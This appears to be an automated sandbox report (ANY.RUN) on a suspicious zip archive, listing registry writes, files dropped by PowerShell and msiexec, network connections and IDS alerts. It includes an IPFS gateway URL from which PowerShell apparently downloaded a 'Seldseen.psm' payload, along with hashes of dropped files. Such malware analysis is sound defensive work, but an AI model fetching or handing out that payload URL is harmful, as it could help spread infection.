Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\_5343f66a8990fda03f679d559553ebefe1b0dfcf562cc46e8566505a4f12f34b.zip

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100
Executable files: 0
Suspicious files: 3
Text files: 5
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 7832
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b0ura1vg.pnx.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7832
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Hastvrks.Mod
Type: text
MD5: B1955682294C6BC7FAF6994AC8B006B3
SHA256: 7265005C07F2D88FC86BAE03AAB157BBD7429256526AB1A17C91F56E9D099C2D

PID: 7832
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 29A5E11E6EE1BE11A0285CEDC1EB163D
SHA256: 3AA00E8C1CB78853DB64F2D2D22EFA4532BFD4B62095C7456BF36E2D284E28DA

PID: 4996
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_db2jjze0.2n1.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4996
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Type: binary
MD5: 8E7D26D71A1CAF822C338431F0651251
SHA256: 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084

PID: 2144
Process: msiexec.exe
Filename: C:\Users\admin\AppData\Roaming\lkrggaptsb.dat
Type: binary
MD5: A8D2EE17DDAAA0A308BBDB207BD3997D
SHA256: 4FD53E7DC91962CC0758EA70A3E57B85E3D3D473F4E065E2F416C9F0E48E8005

PID: 4996
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jww0bbn5.piy.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7832
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nqlmdha1.5aj.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 23
TCP/UDP connections: 50
DNS requests: 25
Threats: 29

HTTP requests

(a dash marks a field left empty in the report)

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
412 | svchost.exe | GET | 200 | 95.101.78.32:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
5596 | MoUsoCoreWorker.exe | GET | 200 | 95.101.78.32:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
5968 | RUXIMICS.exe | GET | 200 | 95.101.78.32:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
- | - | POST | 200 | 40.126.31.3:443 | https://login.live.com/RST2.srf | unknown | xml | 11.1 Kb | unknown
- | - | POST | 200 | 40.126.31.3:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | unknown
- | - | POST | 200 | 20.190.159.130:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | unknown
- | - | GET | 307 | 104.18.41.169:443 | https://bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.w3s.link/Seldseen.psm | unknown | - | - | unknown
- | - | GET | 200 | 209.94.90.3:443 | https://bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.dweb.link/Seldseen.psm | unknown | - | - | unknown
- | - | POST | 200 | 20.190.159.128:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | unknown
- | - | POST | 200 | 20.190.159.131:443 | https://login.live.com/RST2.srf | unknown | xml | 11.0 Kb | unknown

Connections

(a dash marks a field left empty in the report)

PID | Process | IP | Domain | ASN | CN | Reputation
412 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
5596 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5968 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 2.16.106.219:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
412 | svchost.exe | 95.101.78.32:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
5596 | MoUsoCoreWorker.exe | 95.101.78.32:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
5968 | RUXIMICS.exe | 95.101.78.32:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
6396 | svchost.exe | 20.190.160.3:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.124.78.146
whitelisted
www.bing.com
  • 2.16.106.219
  • 2.16.106.205
  • 2.16.106.207
  • 2.16.106.215
  • 2.16.106.226
  • 2.16.106.223
  • 2.16.106.206
  • 2.16.106.208
  • 2.16.106.218
whitelisted
google.com
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 95.101.78.32
  • 95.101.78.42
whitelisted
login.live.com
  • 20.190.160.3
  • 20.190.160.2
  • 20.190.160.22
  • 20.190.160.66
  • 20.190.160.5
  • 40.126.32.140
  • 20.190.160.130
  • 40.126.32.134
whitelisted
bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.w3s.link
  • 104.18.41.169
  • 172.64.146.87
unknown
bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.dweb.link
  • 209.94.90.3
  • 209.94.90.2
unknown
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 74.179.77.204
whitelisted
www.microsoft.com
  • 2.20.154.94
whitelisted

Threats

(a dash marks a field left empty in the report)

PID | Process | Class | Message
7832 | powershell.exe | Misc activity | ET HUNTING Observed IPFS Gateway Domain (ipfs .w3s .link) in TLS SNI
2276 | svchost.exe | Misc activity | ET HUNTING IPFS Gateway Domain in DNS Lookup (ipfs .w3s .link)
2276 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] CIPFS/IPNS Gateway (w3s .link)
2276 | svchost.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] Suspected IPFS Phishing (baf .ipfs)
2276 | svchost.exe | Misc activity | ET HUNTING IPFS Gateway Domain in DNS Lookup (ipfs .dweb .link)
7832 | powershell.exe | Misc activity | ET HUNTING Observed IPFS Gateway Domain (ipfs .dweb .link) in TLS SNI
2276 | svchost.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] Suspected IPFS Phishing (baf .ipfs)
2276 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] IPFS/IPNS Gateway (dweb .link)
2276 | svchost.exe | Potential Corporate Privacy Violation | INFO [ANY.RUN] InterPlanetary File System IPFS Service ( .ipfs .dweb .link)
- | - | Potential Corporate Privacy Violation | POLICY [ANY.RUN] InterPlanetary File System IPFS Service
No debug info